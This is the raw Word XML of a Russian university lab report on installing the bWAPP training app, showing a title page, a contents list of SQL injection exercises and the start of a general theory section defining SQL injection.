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9615C" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Министерство науки и высшего образования Российской Федерации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="4294967292" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A149C3B" wp14:editId="23BA473F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-12699</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>259093</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5965190" cy="38100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1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2372930" y="3780000"/>
                          <a:ext cx="594614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0" o:spid="_x0000_s0" o:spt="32" type="#_x0000_t32" style="position:absolute;z-index:251658240;o:allowoverlap:true;o:allowincell:true;mso-position-horizontal-relative:text;margin-left:-1.00pt;mso-position-horizontal:absolute;mso-position-vertical-relative:text;margin-top:20.40pt;mso-position-vertical:absolute;width:469.70pt;height:3.00pt;mso-wrap-distance-left:9.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:9.00pt;mso-wrap-distance-bottom:-169093.20pt;visibility:visible;" filled="f" strokecolor="#000000" strokeweight="1.50pt">
                <v:stroke dashstyle="solid"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6598E1C2" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:smallCaps/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Федеральное государственное автономное образовательное учреждение </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">высшего образования «Национальный исследовательский университет </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>«Московский институт электронной техники»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519B96D" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Кафедра «Информационная безопасность»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB5E4B" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="491C013C" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="526841BF" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="04AF2C42" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F419AB8" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>ОТЧЕТ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D96E45" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>по проведению лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68165A" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="562E2088" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ЛАБОРАТОРНАЯ РАБОТА №ТЕСТ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A2F732" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F20153" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Устновка и настройка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F297D8E" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="55C29776" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="25397E3C" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="29AC7AA5" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="StGen0"/>
        <w:tblW w:w="9135" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa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65"/>
        <w:gridCol w:w="3470"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C93297" w14:paraId="5024B473" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58E9E448" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
            <w:r>
              <w:t>Выполнил студент учебной группы ИБ-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3470" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="1FE77DEB" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="00AB6179" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB6179">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>_________/_____________/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED65918" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="00AB6179" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB6179">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>подпись (фамилия, инициалы)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C93297" w14:paraId="08A5F5B1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B2B8B9A" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="00AB6179">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3470" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="40975508" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="00AB6179" w:rsidRDefault="00C93297" w:rsidP="0042218F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C93297" w14:paraId="306C6DBF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61CF3C59" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Проверил</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3470" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="664B133F" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="00AB6179" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB6179">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>_________/_____________/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692E4DD2" w14:textId="77777777" w:rsidR="00C93297" w:rsidRPr="00AB6179" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB6179">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>подпись (фамилия, инициалы)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C93297" w14:paraId="4EE838EC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ABB06E9" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3470" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="04050046" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DDC981E" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:bookmarkStart w:id="0" w:name="_gjdgxs"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="52C47D55" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:bookmarkStart w:id="1" w:name="_30j0zll"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5708F5D4" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:bookmarkStart w:id="2" w:name="_1fob9te"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0DCB9897" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:bookmarkStart w:id="3" w:name="_3znysh7"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="56A992C6" w14:textId="147C036B" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="00AB6179">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="00C93297">
          <w:footerReference w:type="default" r:id="rId7"/>
          <w:footerReference w:type="first" r:id="rId8"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_2et92p0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>Москва, 202</w:t>
      </w:r>
      <w:r w:rsidR="00322AE7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> г.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42709F6E" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>СОДЕРЖАНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A10F35" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1388460922"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="76B599EA" w14:textId="51B7D71A" w:rsidR="00322AE7" w:rsidRDefault="00D626E1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82315616" w:history="1">
            <w:r w:rsidR="00322AE7" w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ЦЕЛИ РАБОТЫ</w:t>
            </w:r>
            <w:r w:rsidR="00322AE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00322AE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00322AE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182315616 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00322AE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00322AE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00322AE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00322AE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FDE9FEB" w14:textId="13ABF3FF" w:rsidR="00322AE7" w:rsidRDefault="00322AE7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17" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="ru-RU"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C23B" w14:textId="4843840B" w:rsidR="00322AE7" w:rsidRDefault="00322AE7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18" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">1 Определение </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQLi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D0C54" w14:textId="70202A86" w:rsidR="00322AE7" w:rsidRDefault="00322AE7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19" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 Обнаружение и эксплуатация уязвимостей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EC384" w14:textId="056A79EF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0" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">2.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Извлечение скрытых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F5FFE" w14:textId="0DC1EB20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1" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Извлечение данных из других таблиц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2603A" w14:textId="5B2B73C7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2" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">2.3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>«Слепые» уязвимости SQL-инъекций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5974" w14:textId="7343EBFD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3" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">2.4 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL-инъекции второго порядка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E7C74" w14:textId="0F891463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4" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">2.5 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Изучение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9224B" w14:textId="13FAD173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5" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">2.6 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Справочник по SQL-инъекциям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5AE7" w14:textId="1EB8BDA8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6" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">2.7 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL-инъекция с использованием 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D50F1" w14:textId="4BB287D3" w:rsidR="00322AE7" w:rsidRDefault="00322AE7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7" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd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2583" w14:textId="4CF935EC" w:rsidR="00322AE7" w:rsidRDefault="00322AE7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8" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 Установка Docker на Kali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E504" w14:textId="1933F8A5" w:rsidR="00322AE7" w:rsidRDefault="00322AE7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29" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2 Установка и запуск </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>bWAPP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C766F" w14:textId="5418B706" w:rsidR="00322AE7" w:rsidRDefault="00322AE7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30" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Решение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7211" w14:textId="3A39ADA6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31" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.1 SQL Injection (Login Form/Hero)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CC5AD" w14:textId="1095566F" w:rsidR="00322AE7" w:rsidRDefault="00322AE7">
          <w:pPr>
            <w:pStyle w:val="3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2315632" w:history="1">
            <w:r w:rsidRPr="00A916FF">
              <w:rPr>
                <w:rStyle w:val="afd"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.2 SQL Injection (GET/Select)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_Toc182315632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62E9" w14:textId="3DF84CF9" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2AA47304" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F">
      <w:pPr>
        <w:sectPr w:rsidR="00C93297">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DD294A" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_tyjcwt"/>
      <w:bookmarkStart w:id="6" w:name="_Toc182315616"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ЦЕЛИ РАБОТЫ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1C859E47" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="4D15CB95" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Проверить эффективность и результативность самостоятельной работы студентов над учебным материалом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FF00A" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00D626E1" w:rsidP="0042218F">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Время на выполнение:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 учебных часа (180 минут).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42189277" w14:textId="77777777" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="43B7A91C" w14:textId="7E04AFA9" w:rsidR="00C93297" w:rsidRDefault="00C93297" w:rsidP="0042218F"/>
    <w:p w14:paraId="14D3F463" w14:textId="2F2F3DD1" w:rsidR="00036090" w:rsidRDefault="00036090" w:rsidP="00036090">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc182315617"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ТЕОРЕТИЧЕСКАЯ ЧАСТЬ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="7EF9C7EE" w14:textId="77777777" w:rsidR="000D5501" w:rsidRDefault="000D5501" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42634E2C" w14:textId="46670B7D" w:rsidR="00036090" w:rsidRPr="00A5065A" w:rsidRDefault="009126BC" w:rsidP="006B2540">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc182315618"/>
      <w:r>
        <w:t xml:space="preserve">1 Определение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7A3089C2" w14:textId="77777777" w:rsidR="0079128B" w:rsidRPr="00A5065A" w:rsidRDefault="0079128B" w:rsidP="0079128B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5C12FC" w14:textId="524C9943" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="006B2540" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) – </w:t>
      </w:r>
      <w:r w:rsidR="0079128B" w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">уязвимость веб приложений, которая позволяет злоумышленнику воздействовать на базу данных сервиса, используя инъекцию в </w:t>
      </w:r>
      <w:r w:rsidR="0079128B" w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="0079128B" w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> скрипты. </w:t>
      </w:r>
      <w:r w:rsidR="00541FA4" w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Атакующий может получить доступ к данным, которые не может получить в обычных условиях. Среди них могут быть данные о других пользователях или другая информация о приложении. Также злоумышленник получает доступ к изменению и удалению записей в таблицах базы данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1351170E" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>SQL-инъекция может быть использована злоумышленниками для эскалации атак и компрометации серверов или другой бэкэнд-инфраструктуры, а также может позволить им осуществлять атаки типа «отказ в обслуживании» (DoS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EE2ED5" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Успешная SQL-инъекция может привести к несанкционированному доступу к чувствительным данным, таким как:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54876470" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Пароли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69250C54" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Данные кредитных карт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56E515" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Личная информация пользователей.</w:t>
      </w:r>
    </w:p>
